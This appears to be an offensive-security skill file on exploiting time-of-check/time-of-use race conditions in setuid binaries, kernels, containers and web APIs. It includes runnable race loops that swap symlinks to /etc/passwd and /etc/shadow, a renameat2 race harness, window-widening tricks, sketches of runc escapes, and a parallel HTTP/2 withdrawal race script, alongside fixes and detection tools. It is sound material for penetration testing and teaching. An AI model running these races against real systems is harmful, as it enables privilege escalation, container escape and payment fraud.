--- name: offensive-toctou description: "Time-of-Check / Time-of-Use (TOCTOU) race condition exploitation methodology across binary, kernel, filesystem, web, and container layers. Covers symbolic-link races (open/access/stat split), file-descriptor races, fopen/realpath traversal races, /proc and procfs races, FUSE-backed slow-fs races to widen the window, ptrace and signal races, kernel double-fetch / userspace pointer races, container/runc/symlink escape primitives, kubernetes admission/authz TOCTOU, web auth-vs-authz TOCTOU, JWT-claim TOCTOU at gateway vs service, payment/idempotency races, and modern race-amplification techniques (single-packet attack, slow loris, FUSE pause, cgroup freeze, scheduler shaping). Use when you've identified a 'check then act' pattern in code, when fuzzing for race conditions, or when exploiting concurrency bugs in privileged binaries / kernel / orchestrators." --- # TOCTOU — Time-of-Check / Time-of-Use Exploitation A TOCTOU bug exists wherever code checks a property (file owner, path target, token validity, balance) and then acts on it as if the property still holds. Between check and use is a window — your job is to widen it and swap the underlying object. ## Quick Workflow 1. Identify the **check** (syscall, function, validation step) and the **use** (the privileged action) 2. Confirm the check and use don't operate on the same kernel object (FD, inode, atomic snapshot) 3. Build a primitive that swaps the object between check and use (symlink, mount, mv, parallel request) 4. **Widen the window** with FUSE, slow filesystems, scheduler tricks, or single-packet HTTP/2 5. Run a tight loop and confirm the post-use state corresponds to the swapped target --- ## The Core Pattern ```c // Vulnerable if (access(path, W_OK) == 0) { // check — resolves "path" now fd = open(path, O_WRONLY); // use — re-resolves "path" later write(fd, attacker_data, n); } ``` Between `access` and `open`, an attacker replaces `path` with a symlink to `/etc/shadow`. The check sees an attacker-owned file; the use opens shadow as root. The fix is always: **operate on the kernel object, not the path.** Use `O_NOFOLLOW`, `openat` with `AT_SYMLINK_NOFOLLOW`, `fstat` on the FD, etc. --- ## Filesystem TOCTOU ### Symlink Swap (Classic) ```bash # Setup target — privileged binary that writes to user-supplied path after access() check victim --output /tmp/.attacker/output # Race loop while true; do ln -sf /etc/passwd /tmp/.attacker/output 2>/dev/null ln -sf /tmp/.attacker/legit /tmp/.attacker/output 2>/dev/null done & # Run victim repeatedly while true; do victim --output /tmp/.attacker/output; done ``` ### renameat2(RENAME_EXCHANGE) — Atomic Single-Frame Swap ```c syscall(SYS_renameat2, AT_FDCWD, "good", AT_FDCWD, "bad", RENAME_EXCHANGE); ``` `RENAME_EXCHANGE` swaps two paths atomically — combined with FUSE-paused dir lookups, this is a near-deterministic primitive on Linux ≥ 3.15. ### Directory Swap (mv between two prepared trees) When the victim resolves `parent/file`, swap `parent` itself: ```bash mv good_dir parent && mv evil_dir parent_was_good_dir # If victim is mid-resolution of `parent/file`, dir cache may pin one side ``` ### Bind Mount / Mount-Namespace Swap (root-only or in user-ns) ```bash unshare -mUr mkdir /tmp/x /tmp/y echo benign > /tmp/x/file mount --bind /etc/shadow /tmp/y/file # Then: while true; do mount --move /tmp/x /tmp/m; mount --move /tmp/y /tmp/m; done ``` In containerized contexts with `CAP_SYS_ADMIN` in a user namespace, this is the foundation of multiple runc/CVE escape chains. --- ## Window-Widening Primitives The race is always winnable in theory; in practice you need the window large enough for your swap. ### FUSE-Backed Slow Filesystem Mount a FUSE filesystem you control. When the victim does `open` or `stat`, your handler sleeps: ```python # fusepy class SlowFS(Operations): def getattr(self, path, fh=None): if path == '/trigger': time.sleep(5) # stretch the check return os.lstat(self.root + path).__dict__ ``` Now the check call inside the victim blocks for 5 seconds — plenty of time to swap the post-check filename. ### Userfaultfd (kernel-level page faults) ```c // Register a userfault region; when the victim reads the user-controlled buffer, // pause it in the page-fault handler, swap data, then resume. ioctl(uffd, UFFDIO_REGISTER, ®); ``` `userfaultfd` can pause a kernel-side `copy_from_user` mid-read, enabling double-fetch wins. Linux ≥ 5.11 requires `vm.unprivileged_userfaultfd=1` (off by default in many distros). ### Cgroup Freeze ```bash mkdir /sys/fs/cgroup/race echo $victim_pid > /sys/fs/cgroup/race/cgroup.procs echo 1 > /sys/fs/cgroup/race/cgroup.freeze # pause # swap files echo 0 > /sys/fs/cgroup/race/cgroup.freeze # resume ``` ### Single-CPU Pinning + sched_yield ```c cpu_set_t set; CPU_ZERO(&set); CPU_SET(0, &set); sched_setaffinity(victim_pid, sizeof(set), &set); // Race threads on same CPU — context switch is the only progress unit ``` --- ## Kernel Double-Fetch A kernel function reads the same userspace location twice; an attacker mutates it in between using userfaultfd or another thread. ```c // Vulnerable kernel pattern copy_from_user(&size, &user_arg->size, 4); // first fetch if (size > MAX) return -EINVAL; copy_from_user(buf, user_arg->data, size); // size re-fetched? Or from local? Check carefully. ``` Tooling: KFENCE, Bochspwn-Reloaded, DECAF — fuzzers and analyzers that detect double-fetches. --- ## /proc and procfs Races ### /proc/pid/exe + ptrace `/proc//exe` is a magic symlink. If a privileged binary opens it after fork+exec, an attacker can race the exec to point exe at attacker-controlled binary on a slow filesystem. Foundation of CVE-2019-5736 (runc). ```c // Sketch fd = open("/proc/self/exe", O_RDONLY); // by attacker, in container // Then the host runc opens /proc//exe to write — opens *attacker's* exe → host RCE ``` ### /proc/pid/mem `open("/proc/pid/mem")` followed by `lseek+write` historically bypassed write protections. Modern kernels enforce ptrace credentials at write time, but legacy or patched-out checks still exist in embedded kernels. ### /proc/pid/cwd / fd / root Symlinks resolve at deref time using the target task's namespace. Cross-namespace deref of `/proc/pid/root/etc/shadow` from a sibling container is a recurring vuln class. --- ## Setuid Binary TOCTOU ```c // Vulnerable flow in classic SUID binary if (!access(file, R_OK)) { // check with real UID via access() fd = open(file, O_RDONLY); // open with effective UID = root sendfile(stdout, fd, ...); } ``` Symlink swap between `access` and `open` makes the binary read root-readable files for unprivileged users. **Rule of thumb when reviewing setuid/setgid binaries:** every path appearing twice in a syscall trace is a candidate. ```bash strace -f -e openat,access,stat,lstat,readlink ./suid_binary 2>&1 | grep "$user_input" # Multiple resolutions of the same user-controlled path = TOCTOU surface ``` --- ## Container Escape via TOCTOU ### CVE-2019-5736 (runc) — `/proc/self/exe` Overwrite When a container runs `docker exec`, runc opens `/proc/self/exe` from the host. By replacing the in-container binary with a symlink to `/proc/self/exe`, the host runc rewrites itself. ### CVE-2024-21626 (runc "Leaky Vessels") — Working-Directory FD Leak A leaked file descriptor to the host filesystem could be inherited via `WORKDIR /proc/self/fd/` — the container's first process held a host FD, races on namespace setup let it act on host paths. ### Symlink-on-Mount Race When the runtime resolves a bind-mount source/target path (e.g. for tmpfs setup), a fast attacker swaps a directory in the path with a symlink to `/`. Common in Kubernetes hostPath, Docker volumes, OpenShift SCC bypasses. --- ## Web / API TOCTOU ### Auth vs Authz Split at Gateway ``` Gateway: validates JWT (signature, exp) → forwards to service Service: trusts gateway's "X-User-Id" header ``` If the JWT is revoked between gateway cache and gateway validation, or the gateway caches "valid" results too long, you get post-revocation access. Cache-key confusion (different gateway nodes) widens the window. ### Permission Recheck Skipped on Long-Running Action ```python # Vulnerable def long_export(user, resource_id): check_access(user, resource_id) # check data = stream_resource(resource_id) # use — minutes long return data # access could have been revoked mid-stream ``` Test: revoke access while a download is mid-stream; if data continues, recheck is missing. ### Idempotency-Key Reuse with Different Body ```http POST /api/withdraw Idempotency-Key: K1 { "amount": 1 } POST /api/withdraw Idempotency-Key: K1 { "amount": 1000 } # Same key, different body ``` Many implementations key only on the key, not key+body-hash → second request returns the first's response while still processing the second's debit. ### Single-Packet Multi-Request ``` HTTP/2: hold N requests' DATA frames, send all END_STREAM in one TCP segment. Server schedules N handlers concurrently with sub-millisecond skew → reliable race wins. Tool: Burp Repeater "Send group in parallel (single-packet)". ``` This is the standard primitive for web TOCTOU since 2023; old `httpie ... &` parallelism is obsolete. ### Limit / Quota TOCTOU ```python # Vulnerable if user.balance >= amount: # check user.balance -= amount # use — non-atomic read-modify-write pay(user, amount) ``` Send N parallel requests, each sees the same pre-decrement balance. Fix: atomic decrement with constraint (`UPDATE ... WHERE balance >= amount`). --- ## Mobile / Binary Cookbook ### Android: Intent Redirect TOCTOU Activity checks calling package via `getCallingPackage()` then dispatches via Intent — between check and dispatch, attacker swaps the underlying ContentProvider URI authority resolution. ### iOS: NSXPC Audit Token Confusion `audit_token_t` should be captured at the start of each XPC message handling. If the service captures it once and reuses, an attacker can race PID reuse to impersonate. --- ## Detection & Tooling | Tool | Layer | Use | |------|-------|-----| | `strace -e trace=file -f` | Linux syscall | Find duplicate path resolutions | | `bpftrace` / `bcc` | Kernel | Probe specific syscalls' args at scale | | ThreadSanitizer (TSan) | Userspace C/C++ | Compile-time race detection | | Helgrind / DRD | Userspace | Pthread race detection | | Bochspwn-Reloaded | Kernel | Double-fetch detection | | `syzkaller` | Kernel | Coverage-guided race fuzzing | | Burp Suite (Repeater single-packet) | Web/HTTP | Concurrent request races | | `racepwn` | Web | Multi-thread + timing harness | | `Turbo Intruder` | Web | Pipelined parallel requests | ```bash # Quick filesystem TOCTOU finder against a binary strace -f -e trace=file ./target 2>&1 | \ awk -F'"' '/access|stat|lstat|open|readlink/ {print $2}' | \ sort | uniq -c | sort -rn | head # Paths appearing N>1 times → TOCTOU candidates ``` --- ## Race Loop Templates ### Filesystem (C) ```c #include #include int main() { pid_t p = fork(); if (!p) { for(;;) syscall(SYS_renameat2, -100,"a",-100,"b",RENAME_EXCHANGE); } for(;;) execve(victim, args, env); } ``` ### Web (Python — single-packet HTTP/2) ```python # Use httpx or h2 directly; pyburp or turbo-intruder for production import httpx, anyio async def race(): async with httpx.AsyncClient(http2=True) as c: async with anyio.create_task_group() as tg: for _ in range(30): tg.start_soon(c.post, "https://app/withdraw", json={"amount": 100}) anyio.run(race) ``` For real reliability on TLS, prefer Burp's single-packet feature — it crafts an HTTP/2 last-byte synchronization. --- ## Reporting / Severity A TOCTOU finding's severity rests on: window size (deterministic vs probabilistic), required adjacency (local user / container / authenticated remote), and the post-use primitive (file write, auth bypass, money). A "1-in-10000 race that gives root" is the same finding as a "deterministic race that gives root" once it's chained with a window-widening primitive. Always demonstrate: 1. The minimum reproducer 2. The window-widener used 3. The success rate observed 4. The post-exploit primitive achieved --- ## Key References - MITRE CWE-367 (TOCTOU), CWE-362 (Race Condition) - USENIX Security: "FUSE for Profit" — TOCTOU window-widening - PortSwigger Research: "Smashing the state machine" (single-packet HTTP/2 attack) - runc CVE-2019-5736, CVE-2024-21626 advisories - Source: https://github.com/SnailSploit/offensive-checklist/blob/main/toctou.md